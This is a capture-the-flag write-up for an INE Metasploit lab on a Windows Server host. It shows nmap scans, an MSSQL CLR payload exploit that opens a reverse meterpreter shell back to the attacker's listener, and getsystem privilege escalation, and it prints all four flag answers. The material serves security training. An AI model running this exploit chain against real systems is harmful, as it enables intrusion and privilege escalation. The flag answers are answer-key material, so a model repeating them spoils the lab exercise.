The Metasploit Framework CTF 1
Overview¶
Windows systems are common targets in penetration testing due to their extensive use in corporate environments. This lab focuses on exploiting Windows-based services and configurations using the Metasploit Framework (MSF). Participants will gain hands-on experience accessing vulnerable services, exploring sensitive directories, and escalating privileges to retrieve hidden information.
The objective is to highlight the risks associated with misconfigured accounts, exposed directories, and improper privilege management in Windows environments.
In this lab environment, you will have GUI access to a Kali machine. The target machine will be accessible at target.ine.local.
Objective: Use Metasploit and manual investigation techniques to capture the following flags:
Flag 1: Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag.
Flag 2: Locate the second flag within the Windows configuration folder.
Flag 3: The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag.
Flag 4: Investigate the Administrator directory to find the fourth flag.
Writeup¶
Flag 1¶
Let's start with an nmap scan:
──(root㉿INE)-[~]
└─# nmap -p- target.ine.local --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-08 18:00 IST
Nmap scan report for target.ine.local (10.4.16.160)
Host is up (0.011s latency).
Not shown: 65517 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
2019/tcp filtered whosockami
3389/tcp open ms-wbt-server
5985/tcp open wsman
25741/tcp filtered unknown
44573/tcp filtered unknown
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49180/tcp open unknown
49181/tcp open unknown
49192/tcp open unknown
58545/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
Run nmap with scripts and version detection on the ports:
┌──(root㉿INE)-[~]
└─# nmap -p`cat Desktop/ports.txt` -sC -sV target.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-08 18:01 IST
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 92.86% done; ETC: 18:02 (0:00:05 remaining)
Nmap scan report for target.ine.local (10.4.16.160)
Host is up (0.010s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2012 11.00.6020.00; SP3
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-04-08T12:23:53
|_Not valid after: 2055-04-08T12:23:53
| ms-sql-ntlm-info:
| 10.4.16.160\MSSQLSERVER:
| Target_Name: WIN-5BQ22OKH4SO
| NetBIOS_Domain_Name: WIN-5BQ22OKH4SO
| NetBIOS_Computer_Name: WIN-5BQ22OKH4SO
| DNS_Domain_Name: WIN-5BQ22OKH4SO
| DNS_Computer_Name: WIN-5BQ22OKH4SO
|_ Product_Version: 6.3.9600
| ms-sql-info:
| 10.4.16.160\MSSQLSERVER:
| Instance name: MSSQLSERVER
| Version:
| name: Microsoft SQL Server 2012 SP3
| number: 11.00.6020.00
| Product: Microsoft SQL Server 2012
| Service pack level: SP3
| Post-SP patches applied: false
| TCP port: 1433
|_ Clustered: false
|_ssl-date: 2025-04-08T12:32:47+00:00; -1s from scanner time.
2019/tcp closed whosockami
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: WIN-5BQ22OKH4SO
| NetBIOS_Domain_Name: WIN-5BQ22OKH4SO
| NetBIOS_Computer_Name: WIN-5BQ22OKH4SO
| DNS_Domain_Name: WIN-5BQ22OKH4SO
| DNS_Computer_Name: WIN-5BQ22OKH4SO
| Product_Version: 6.3.9600
|_ System_Time: 2025-04-08T12:32:40+00:00
| ssl-cert: Subject: commonName=WIN-5BQ22OKH4SO
| Not valid before: 2025-01-08T07:08:38
|_Not valid after: 2025-07-10T07:08:38
|_ssl-date: 2025-04-08T12:32:47+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
25741/tcp closed unknown
44573/tcp closed unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49180/tcp open msrpc Microsoft Windows RPC
49181/tcp open msrpc Microsoft Windows RPC
49192/tcp open msrpc Microsoft Windows RPC
58545/tcp closed unknown
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-04-08T12:32:40
|_ start_date: 2025-04-08T12:23:52
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.32 seconds
Open Metasploit and check for vulnerabilities. Import the nmap scan.
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.4.16.160 135 tcp msrpc open Microsoft Windows RPC
10.4.16.160 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.4.16.160 445 tcp microsoft-ds open Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
10.4.16.160 1433 tcp ms-sql-s open Microsoft SQL Server 2012 11.00.6020.00; SP3
10.4.16.160 2019 tcp whosockami closed
10.4.16.160 3389 tcp ssl/ms-wbt-server open
10.4.16.160 5985 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.4.16.160 25741 tcp closed
10.4.16.160 44573 tcp closed
10.4.16.160 47001 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.4.16.160 49152 tcp msrpc open Microsoft Windows RPC
10.4.16.160 49153 tcp msrpc open Microsoft Windows RPC
10.4.16.160 49154 tcp msrpc open Microsoft Windows RPC
10.4.16.160 49155 tcp msrpc open Microsoft Windows RPC
10.4.16.160 49180 tcp msrpc open Microsoft Windows RPC
10.4.16.160 49181 tcp msrpc open Microsoft Windows RPC
10.4.16.160 49192 tcp msrpc open Microsoft Windows RPC
10.4.16.160 58545 tcp closed
msf6 > search Mssql 2012
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/mssql/mssql_clr_payload 1999-01-01 excellent Yes Microsoft SQL Server Clr Stored Procedure Payload Execution
1 exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution
2 post/windows/manage/mssql_local_auth_bypass . normal No Windows Manage Local Microsoft SQL Server Authorization Bypass
Interact with a module by name or index. For example info 2, use 2 or use post/windows/manage/mssql_local_auth_bypass
msf6 >
Set the necessary options and try:
msf6 exploit(windows/mssql/mssql_clr_payload) > run
[*] Started reverse TCP handler on 10.10.39.3:4444
[!] 10.4.16.160:1433 - Setting EXITFUNC to 'thread' so we don't kill SQL Server
[-] 10.4.16.160:1433 - Exploit aborted due to failure: bad-config: Target SQL server arch is x64, payload architecture is x86
[*] Exploit completed, but no session was created.
msf6 exploit(windows/mssql/mssql_clr_payload) >
Use the x64 meterpreter payload:
msf6 exploit(windows/mssql/mssql_clr_payload) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/mssql/mssql_clr_payload) > show options
Module options (exploit/windows/mssql/mssql_clr_payload):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE master yes The database to load the CLR Assembly into.
PASSWORD no The password for the specified username
RHOSTS target.ine.local yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentication (requires DOMAIN option set)
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.39.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
sf6 exploit(windows/mssql/mssql_clr_payload) > run
[*] Started reverse TCP handler on 10.10.39.3:4444
[!] 10.4.16.160:1433 - Setting EXITFUNC to 'thread' so we don't kill SQL Server
[*] 10.4.16.160:1433 - Database does not have TRUSTWORTHY setting on, enabling ...
[*] 10.4.16.160:1433 - Database does not have CLR support enabled, enabling ...
[*] 10.4.16.160:1433 - Using version v3.5 of the Payload Assembly
[*] 10.4.16.160:1433 - Adding custom payload assembly ...
[*] 10.4.16.160:1433 - Exposing payload execution stored procedure ...
[*] 10.4.16.160:1433 - Executing the payload ...
[*] 10.4.16.160:1433 - Removing stored procedure ...
[*] 10.4.16.160:1433 - Removing assembly ...
[*] Sending stage (201798 bytes) to 10.4.16.160
[*] 10.4.16.160:1433 - Restoring CLR setting ...
[*] 10.4.16.160:1433 - Restoring Trustworthy setting ...
[*] Meterpreter session 1 opened (10.10.39.3:4444 -> 10.4.16.160:49456) at 2025-04-08 18:27:43 +0530
meterpreter >
We have a shell! Now let's search for the flag:
C:\Windows\system32>cd ../..
cd ../../
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5CD6-020B
Directory of C:\
04/08/2025 12:24 PM 34 flag1.txt
08/22/2013 03:52 PM <DIR> PerfLogs
01/09/2025 07:00 AM <DIR> Program Files
12/15/2024 09:27 AM <DIR> Program Files (x86)
01/09/2025 07:12 AM <DIR> Users
01/09/2025 07:08 AM <DIR> Windows
1 File(s) 34 bytes
5 Dir(s) 3,738,730,496 bytes free
C:\>type flag1.txt
type flag1.txt
Answer
41bdcc800934491094bb43e0fbde5358
Flag 2¶
It probably refers to System32. Inside, I find a folder named config:
C:\Windows\system32>dir /ad
dir /ad
Volume in drive C has no label.
Volume Serial Number is 5CD6-020B
Directory of C:\Windows\system32
04/08/2025 12:27 PM <DIR> .
04/08/2025 12:27 PM <DIR> ..
03/18/2014 09:25 AM <DIR> 0409
12/15/2024 09:20 AM <DIR> 1033
08/22/2013 03:39 PM <DIR> AdvancedInstallers
08/22/2013 03:39 PM <DIR> AppLocker
09/09/2020 04:42 AM <DIR> Appraiser
03/18/2014 10:23 AM <DIR> ar-SA
02/23/2018 08:00 AM <DIR> awsrunPowerShellScript
08/22/2013 03:39 PM <DIR> BestPractices
03/18/2014 10:23 AM <DIR> bg-BG
04/14/2021 04:03 AM <DIR> Boot
12/15/2021 03:42 AM <DIR> catroot
12/15/2021 04:15 AM <DIR> catroot2
07/14/2021 04:08 AM <DIR> CodeIntegrity
11/18/2014 11:26 PM <DIR> Com
09/09/2020 04:42 AM <DIR> CompatTel
04/08/2025 12:44 PM <DIR> config
01/04/2022 03:37 AM <DIR> Configuration
03/18/2014 10:23 AM <DIR> cs-CZ
03/18/2014 10:23 AM <DIR> da-DK
...
C:\Windows\System32>cd config
cd config
Access is denied.
But access is denied. Let's try getsystem.
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > cd config
meterpreter > dir
Listing: C:\Windows\system32\config
===================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 8192 fil 2025-01-09 12:35:27 +0530 BBI
100666/rw-rw-rw- 8192 fil 2013-08-22 18:55:30 +0530 BBI.LOG1
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 BBI.LOG2
100666/rw-rw-rw- 65536 fil 2013-08-22 18:55:44 +0530 BBI{42b8217e-0b2e-11e3-93f4-90b11c2eb9f2}.TM.blf
100666/rw-rw-rw- 524288 fil 2013-08-22 18:55:44 +0530 BBI{42b8217e-0b2e-11e3-93f4-90b11c2eb9f2}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2013-08-22 18:55:44 +0530 BBI{42b8217e-0b2e-11e3-93f4-90b11c2eb9f2}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw- 262144 fil 2014-05-09 06:22:13 +0530 BCD-Template
100666/rw-rw-rw- 28672 fil 2013-08-22 21:16:48 +0530 BCD-Template.LOG
100666/rw-rw-rw- 0 fil 2014-03-18 15:11:56 +0530 BCD-Template.LOG1
100666/rw-rw-rw- 0 fil 2014-03-18 15:11:56 +0530 BCD-Template.LOG2
100666/rw-rw-rw- 101187584 fil 2025-04-08 18:14:16 +0530 COMPONENTS
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 COMPONENTS.LOG
100666/rw-rw-rw- 880640 fil 2013-08-22 18:55:30 +0530 COMPONENTS.LOG1
100666/rw-rw-rw- 6574080 fil 2013-08-22 18:55:30 +0530 COMPONENTS.LOG2
100666/rw-rw-rw- 65536 fil 2025-04-08 18:14:16 +0530 COMPONENTS{9c9f9f6a-ae7e-11e3-80ba-0026b955dac2}.TM.blf
100666/rw-rw-rw- 524288 fil 2025-04-08 18:14:16 +0530 COMPONENTS{9c9f9f6a-ae7e-11e3-80ba-0026b955dac2}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2025-04-08 18:14:16 +0530 COMPONENTS{9c9f9f6a-ae7e-11e3-80ba-0026b955dac2}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw- 2621440 fil 2025-01-09 12:43:03 +0530 DEFAULT
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 DEFAULT.LOG
100666/rw-rw-rw- 2027520 fil 2013-08-22 18:55:30 +0530 DEFAULT.LOG1
100666/rw-rw-rw- 12288 fil 2013-08-22 18:55:30 +0530 DEFAULT.LOG2
100666/rw-rw-rw- 4521984 fil 2025-04-08 18:06:21 +0530 DRIVERS
100666/rw-rw-rw- 188416 fil 2013-08-22 21:04:27 +0530 DRIVERS.LOG1
100666/rw-rw-rw- 8192 fil 2013-08-22 21:04:27 +0530 DRIVERS.LOG2
100666/rw-rw-rw- 65536 fil 2021-12-15 09:31:38 +0530 DRIVERS{e50cbcff-0b3d-11e3-b794-c222b49a96f2}.TM.blf
100666/rw-rw-rw- 524288 fil 2021-12-15 09:31:38 +0530 DRIVERS{e50cbcff-0b3d-11e3-b794-c222b49a96f2}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2014-05-09 05:25:35 +0530 DRIVERS{e50cbcff-0b3d-11e3-b794-c222b49a96f2}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw- 8192 fil 2013-08-22 18:55:30 +0530 ELAM
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 ELAM.LOG1
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 ELAM.LOG2
100666/rw-rw-rw- 164 fil 2013-08-22 18:59:29 +0530 FP
040777/rwxrwxrwx 0 dir 2013-08-22 18:55:43 +0530 Journal
040777/rwxrwxrwx 4096 dir 2025-04-08 18:03:57 +0530 RegBack
100666/rw-rw-rw- 262144 fil 2025-01-09 12:43:03 +0530 SAM
100666/rw-rw-rw- 36864 fil 2013-08-22 18:55:30 +0530 SAM.LOG1
100666/rw-rw-rw- 28672 fil 2013-08-22 18:55:30 +0530 SAM.LOG2
100666/rw-rw-rw- 262144 fil 2025-01-09 12:43:03 +0530 SECURITY
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 SECURITY.LOG
100666/rw-rw-rw- 28672 fil 2013-08-22 18:55:30 +0530 SECURITY.LOG1
100666/rw-rw-rw- 8192 fil 2013-08-22 18:55:30 +0530 SECURITY.LOG2
100666/rw-rw-rw- 89653248 fil 2025-01-09 12:43:03 +0530 SOFTWARE
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 SOFTWARE.LOG
100666/rw-rw-rw- 15355904 fil 2013-08-22 18:55:30 +0530 SOFTWARE.LOG1
100666/rw-rw-rw- 16384 fil 2013-08-22 18:55:30 +0530 SOFTWARE.LOG2
100666/rw-rw-rw- 12582912 fil 2025-01-09 12:43:03 +0530 SYSTEM
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 SYSTEM.LOG
100666/rw-rw-rw- 12460032 fil 2013-08-22 18:55:30 +0530 SYSTEM.LOG1
100666/rw-rw-rw- 4153344 fil 2013-08-22 18:55:30 +0530 SYSTEM.LOG2
100666/rw-rw-rw- 65536 fil 2021-09-15 11:22:34 +0530 SYSTEM{9c9f9f4c-ae7e-11e3-80ba-0026b955dac2}.TM.blf
100666/rw-rw-rw- 524288 fil 2021-09-15 11:22:34 +0530 SYSTEM{9c9f9f4c-ae7e-11e3-80ba-0026b955dac2}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2021-09-15 11:22:34 +0530 SYSTEM{9c9f9f4c-ae7e-11e3-80ba-0026b955dac2}.TMContainer00000000000000000002.regtrans-ms
040777/rwxrwxrwx 8192 dir 2014-03-18 16:02:48 +0530 TxR
100666/rw-rw-rw- 34 fil 2025-04-08 17:54:27 +0530 flag2.txt
040777/rwxrwxrwx 4096 dir 2014-06-21 01:26:20 +0530 systemprofile
meterpreter > cat flag2.txt
meterpreter >
Answer
6bade9dad8754a1384a725a019085a26
Flag 3¶
Search for text files in System32:
C:\Windows\system32>dir /b /s "*.txt"
C:\Windows\system32\catroot2\dberr.txt
C:\Windows\system32\config\flag2.txt
C:\Windows\system32\config\systemprofile\AppData\Local\Amazon\Ec2Config\Logs\FrameworkLaunchException.txt
C:\Windows\system32\drivers\gmreadme.txt
C:\Windows\system32\drivers\etc\EscaltePrivilageToGetThisFlag.txt
C:\Windows\system32\en-US\erofflps.txt
C:\Windows\system32\WindowsPowerShell\v1.0\en-US\default.help.txt
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\en-US\about_BITS_Cmdlets.help.txt
C:\Windows\system32>type drivers\etc\EscaltePrivilageToGetThisFlag.txt
type drivers\etc\EscaltePrivilageToGetThisFlag.txt
Answer
3df7b3d9f40d4fcd971ef528f6d63899
Flag 4¶
Navigate to the Administrator's Desktop.
C:\Windows\system32>cd ../../Users/Administrator
cd ../../Users/Administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5CD6-020B
Directory of C:\Users\Administrator\Desktop
04/08/2025 01:21 PM <DIR> .
04/08/2025 01:21 PM <DIR> ..
04/08/2025 01:21 PM 34 flag4.txt
1 File(s) 34 bytes
2 Dir(s) 3,486,302,208 bytes free
C:\Users\Administrator\Desktop>type flag4.txt
type flag4.txt
Answer
8134e3279e464e3b8b6e01bcaa1e8ba4